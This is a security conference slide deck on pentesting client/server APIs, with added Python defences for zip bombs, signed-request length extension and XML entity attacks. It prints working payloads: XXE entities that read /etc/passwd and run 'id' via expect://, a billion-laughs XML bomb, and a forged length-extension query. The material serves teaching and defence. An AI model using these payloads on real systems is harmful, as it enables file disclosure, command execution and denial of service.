
API Pentest

Contain about various api and all

Uploaded by

Mr. Ramya Shah

Pentesting client/server API

Sergey Belov
$ whoami

• Senior Security Auditor at Digital Security


• BugHunter: Google, Yandex, Badoo, Yahoo +++
• Writer: habrahabr, Xakep magazine
• CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013
• Speaker: CodeFest 2012, ZeroNights 0x03
• Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)
© 2002—2014, Digital Security 2
What are we talking about?

API

Hacking via API

From interface to API methods

What should we test?


• Logic!
• Bypassing restrictions (sqli/xss)
• Parameter tampering
Development:
• Stop hacks and custom (home-grown) implementations in the API! Really.

ZIP
42 Kb…
…10 Gb?
…100 Gb?
…100 Tb?

…4.5 Pb! http://www.unforgettable.dk/

Say HELLO to ZIP BOMB!
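
An added example, not part of the deck: the upload-side check a defender wants against the zip bomb described above, in Python. It reads only the central directory to compute the declared size and compression ratio, lists nested archives (the 42.zip layout) so the same check can be run on them recursively, and enforces a hard cap on the bytes actually inflated, since header sizes can lie. The limits and the build_zip helper are constructed for this illustration.

```python
import io
import zipfile

# Policy limits for this example (constructed values; tune per service).
MAX_TOTAL_UNCOMPRESSED = 8 * 1024 * 1024   # 8 MiB across all members
MAX_RATIO = 100                            # declared size / compressed size
MAX_MEMBERS = 1000
ARCHIVE_SUFFIXES = (".zip", ".gz", ".bz2", ".xz", ".7z", ".rar")

def inspect_zip(data: bytes) -> dict:
    """Check central-directory metadata before inflating anything.
    Nested archives (the 42.zip layout) are listed under 'nested' so the
    caller can run this same check on them instead of extracting blindly."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
    declared = sum(i.file_size for i in infos)
    compressed = sum(i.compress_size for i in infos)
    # A non-empty member with zero compressed bytes is infinitely suspicious.
    ratio = declared / compressed if compressed else (float("inf") if declared else 0.0)
    nested = [i.filename for i in infos if i.filename.lower().endswith(ARCHIVE_SUFFIXES)]
    if len(infos) > MAX_MEMBERS:
        reason = "too many members"
    elif declared > MAX_TOTAL_UNCOMPRESSED:
        reason = "declared size over limit"
    elif ratio > MAX_RATIO:
        reason = "compression ratio over limit"
    else:
        reason = "ok"
    return {"ok": reason == "ok", "reason": reason, "declared": declared,
            "ratio": ratio, "nested": nested}

def extract_member_capped(data: bytes, name: str, cap: int = MAX_TOTAL_UNCOMPRESSED) -> bytes:
    """Inflate one member while counting the bytes actually produced;
    header sizes can lie, so the cap is enforced on the real stream."""
    out = bytearray()
    with zipfile.ZipFile(io.BytesIO(data)) as zf, zf.open(name) as fh:
        while chunk := fh.read(64 * 1024):
            out += chunk
            if len(out) > cap:
                raise ValueError(f"{name}: inflated past {cap} bytes, aborting")
    return bytes(out)

def build_zip(members: dict) -> bytes:
    """Constructed test archive: member name -> content, deflate-compressed."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in members.items():
            zf.writestr(name, body)
    return buf.getvalue()
```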
The evil of JavaScript


and

http://habrahabr.ru/post/186160/
Crypto
Query signing

Sign = sha*(… + DATA + …), where the secret APIkey is concatenated into the hashed string
But why?
Say hello again: to the length extension attack.

DATA  = A=1&B=2&C=3
TOKEN = 07ce36c769ae130708258fb5dfa3d37ca5a67514
TOKEN = sha1(KEY+DATA)

Someone has hijacked just one request…

What does the attacker know?


• Original data
• Sign (token)

What does the attacker want?

Change some data / change params


A=1&B=2&C=3\x80\x00\x00…\x02&C=4

Can sign a new query without the API key!


Vkontakte: sig = md5(name1=value1name2=value2api_secret)
Mail.RU sig = md5(uid + params + private_key)

http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
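
The TOKEN = sha1(KEY+DATA) scheme above is what the deck breaks. As an added example (not from the slides), here is the server-side fix in Python: sign with HMAC-SHA1 instead of a bare hash over a concatenation, compare in constant time, and parse the query strictly so that the padded, duplicated-parameter forgery shown above is rejected on shape alone. The KEY value and the function names are constructed for this illustration.

```python
import hashlib
import hmac
from urllib.parse import parse_qsl

KEY = b"constructed-demo-secret"  # constructed; real keys live in a secret store

def naive_token(key: bytes, data: bytes) -> str:
    """The deck's scheme, TOKEN = sha1(KEY + DATA): knowing one (DATA, TOKEN)
    pair lets anyone extend DATA with padding plus new parameters."""
    return hashlib.sha1(key + data).hexdigest()

def hmac_token(key: bytes, data: bytes) -> str:
    """HMAC-SHA1 runs the key through an inner and an outer hash, so the
    observed token is not an intermediate state that can be extended."""
    return hmac.new(key, data, hashlib.sha1).hexdigest()

def parse_query_strict(data: bytes) -> dict:
    """Reject what an extended query looks like: bytes outside printable ASCII
    (the \\x80 \\x00 ... length padding) and a parameter name repeated
    (&C=4 appended after C=3). Duplicate keys raise instead of last-wins."""
    if any(b < 0x20 or b > 0x7E for b in data):
        raise ValueError("non-printable byte in query")
    pairs = parse_qsl(data.decode("ascii"), keep_blank_values=True, strict_parsing=True)
    params = {}
    for name, value in pairs:
        if name in params:
            raise ValueError(f"duplicate parameter {name!r}")
        params[name] = value
    return params

def verify_request(data: bytes, token: str, key: bytes = KEY) -> dict:
    """Server-side check: constant-time HMAC comparison first, strict parse second."""
    if not hmac.compare_digest(hmac_token(key, data), token):
        raise ValueError("bad signature")
    return parse_query_strict(data)
```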
Request hijacking…
How?

XML? XML entities!

DTD example:

<!ENTITY writer "Donald Duck.">
<!ENTITY copyright "Copyright W3Schools.">

XML example:

<author>&writer;&copyright;</author>

XML entities?
External Entity!
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<foo>&xxe;</foo>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>

<foo>&xxe;</foo>
XML Bombs!
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

What are we talking about?

Man in the Middle

Examples?

2013-11-19 by Reginaldo Silva


https://www.facebook.com/BugBounty/posts/778897822124446
http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
Testing:
• https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)
• XXE to RCE https://gist.github.com/joernchen/3623896

Development:
• Disable entities (external entities and DTD processing) in the XML parser
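
An added example, not from the slides: a Python parsing policy that implements the "Disable entities" advice with the standard library's expat bindings. It refuses any DOCTYPE, entity declaration or external entity reference, which stops both the SYSTEM-entity payloads and the lolz expansion above before a single entity is resolved. The sample inputs are constructed from the deck's examples (the bomb is shortened to two levels), and the function names are this example's own.

```python
import xml.parsers.expat as expat

class UnsafeXML(Exception):
    """Raised when a document carries a DTD, an entity declaration or an external reference."""

def parse_without_entities(doc: bytes) -> dict:
    """Parse with a no-DTD policy and return element/text counts on success.
    Rejecting the DOCTYPE itself is what makes this safe: XXE and the
    billion-laughs bomb both need the DTD to declare their entities."""
    parser = expat.ParserCreate()
    stats = {"elements": 0, "text_bytes": 0}

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML("DOCTYPE/DTD is not accepted by this API")

    def forbid_entity_decl(*args):
        raise UnsafeXML("entity declarations are not accepted")

    def forbid_external_ref(context, base, sysid, pubid):
        raise UnsafeXML("external entity reference refused")

    def on_start(name, attrs):
        stats["elements"] += 1

    def on_text(data):
        stats["text_bytes"] += len(data)

    # Exceptions raised inside expat handlers abort the parse and propagate.
    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity_decl
    parser.ExternalEntityRefHandler = forbid_external_ref
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_text
    parser.Parse(doc, True)
    return stats

def is_accepted(doc: bytes) -> bool:
    """True if the document passes the policy, False if it was refused."""
    try:
        parse_without_entities(doc)
        return True
    except UnsafeXML:
        return False

# Constructed inputs shaped like the slides' examples.
BENIGN = b"<author>Donald Duck</author>"
XXE_FILE = (b'<!DOCTYPE foo [<!ELEMENT foo ANY >'
            b'<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>')
BOMB = (b'<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol">'
        b'<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">'
        b'<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">'
        b']><lolz>&lol2;</lolz>')
```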

Finally:
• Re-test all interface restrictions;
• Specific compressions;
• JS callbacks;
• Crypto + SSL test + hardcoded credentials (hackapp.com);
• XML - XXE;
• Anything else :]
Thanks for your attention!


Questions?

Digital Security in Moscow: (495) 223-07-86
Digital Security in Saint Petersburg: (812) 703-15-47
twitter.com/sergeybelove
sbelov@dsec.ru